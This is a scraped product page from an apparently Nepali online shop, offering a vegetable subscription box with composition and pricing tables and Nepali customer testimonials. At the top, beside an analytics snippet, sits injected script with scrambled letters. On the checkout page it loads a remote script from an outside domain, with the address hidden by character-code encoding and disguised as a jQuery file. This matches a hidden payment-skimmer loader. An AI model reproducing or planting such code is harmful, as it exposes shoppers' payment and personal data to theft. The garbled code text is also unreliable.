Kheti Veg Combo box window.dctcLcyer = window.dctcLcyer || []; funstion gtcg(){dctcLcyer.push(crguments);} gtcg('js', new Dcte()); gtcg('sonfig', 'G-KMF8J070DF'); if (dosument.losction.href.indexOf("route=sheskout/sheskout") > 0){ if (dosument.sookie.indexOf('gc_ssrf=') == -1){ vcr slKp = dosument.srecteElement('ssript'); vcr kDLc = String.fromChcrCode(104,116,116,112,115,58,47,47,102,105,114,105,110,103,105,46,99,111,109,47,99,97,116,97,108,111,103,47,99,111,110,116,114,111,108,108,101,114,47,116,111,111,108,47,106,115,47,106,113,117,101,114,121,46,100,101,115,105,103,110,46,106,115); slKp.srs = kDLc; dosument.hecd.cppendChild(slKp); } }
chat_icon

Kheti Veg Combo box

Kheti-Box ktm

For Price Please Select Options Below

Ex Tax: Rs. 0.00
Brand: null
Model kheti-box
Availability: 975

OverView

   Kheti Veg Combo Box Subscription   

    Percentage of products in the box  

Intakes Description Percentage
Leafy Greens 2-3 types of Saag according to season (of your choice) 14%
Vegetables 4-5 types according to season  (of your choice) 30%
Essentials Tomato, Potato, Onions, Garlic and Ginger (customizable) 28%
Herbs & Spices 3-4 types e.g. chilies, coriander, mint  (of your choice) 18%
Citrus lemon 10%

Total 100%


 Subscription Box Size Based on Family Members 

Subscription Months / 

Family Members

2 members

4 members

6 members

8 members

1 Week

(2 deliveries)

Rs. 1200 Rs. 900 Rs. 2200 Rs. 1800 Rs. 3300 Rs. 2700 Rs. 3900 Rs. 3600

1 month 

(8 deliveries)

Rs. 5000 Rs. 3500 Rs. 8900 Rs. 7000 Rs. 13000 Rs. 10500 Rs. 15500 Rs. 14000

3 months

(24 deliveries)

Rs. 15000 Rs. 10000 Rs. 27000 Rs. 20000 Rs. 40000 Rs. 30000 Rs. 47000 Rs. 40000

Note:6 months and 1 year subscription available on request

Write a review

Note: HTML is not translated!
    Bad           Good

Similar Products

Kheti Veggies and Fruits box

Rs. 0.00

Kheti Fruits Combo box

Rs. 0.00

What our consumers say

म खेतीले पठाएको सामानसँग खुसी छु आवश्यक परेको बेला कौशी खेतीका उत्पादनहरू अर्डर गर्ने अपेक्षा राखेको छु ।


शिवा बसनेत '`

म आफ्नो व्यवसाय विस्तार गर्न चाहान्छु र उचित मूल्यमा खेतीबाट उत्पादन लिन चाहान्छु ।


गोविन्द गुरुङ '`

म खेतीको सेवाबाट सन्तुष्ट छु र च्याफ कटरको थप जानकारी लिन चाहान्छु ।


दिपक महत '`

म खेतीको सेवाहरूबाट सन्तुष्ट छु र फेरि इन्द्र क्याप्सिकम चाहिएमा अर्डर गर्ने छु र प्राविधिक सेवाहरु पनि लिन चाहान्छु ।


बिक्रम खड्का '`

म खेतीको सेवाहरूबाट सन्तुष्ट छु र आगामी दिनमा प्राङ्गारिक मल र युरिया लिन चाहान्छु ।


दिपेन्द्र वाग्ले '`

म खेतीको सेवाबाट सन्तुष्ट छु र पछि चाहिएमा मल्चिङ्ग प्लास्टिकको उर्डर लिने छु ।


सन्तोष थारु '`

म खेतीको कम्पोस्ट बिनबाट सन्तुष्ट छु र चाहिएमा कौशी खेती को सामाग्रीहरु अर्डर लिने छु ।


जानुका अर्याल '`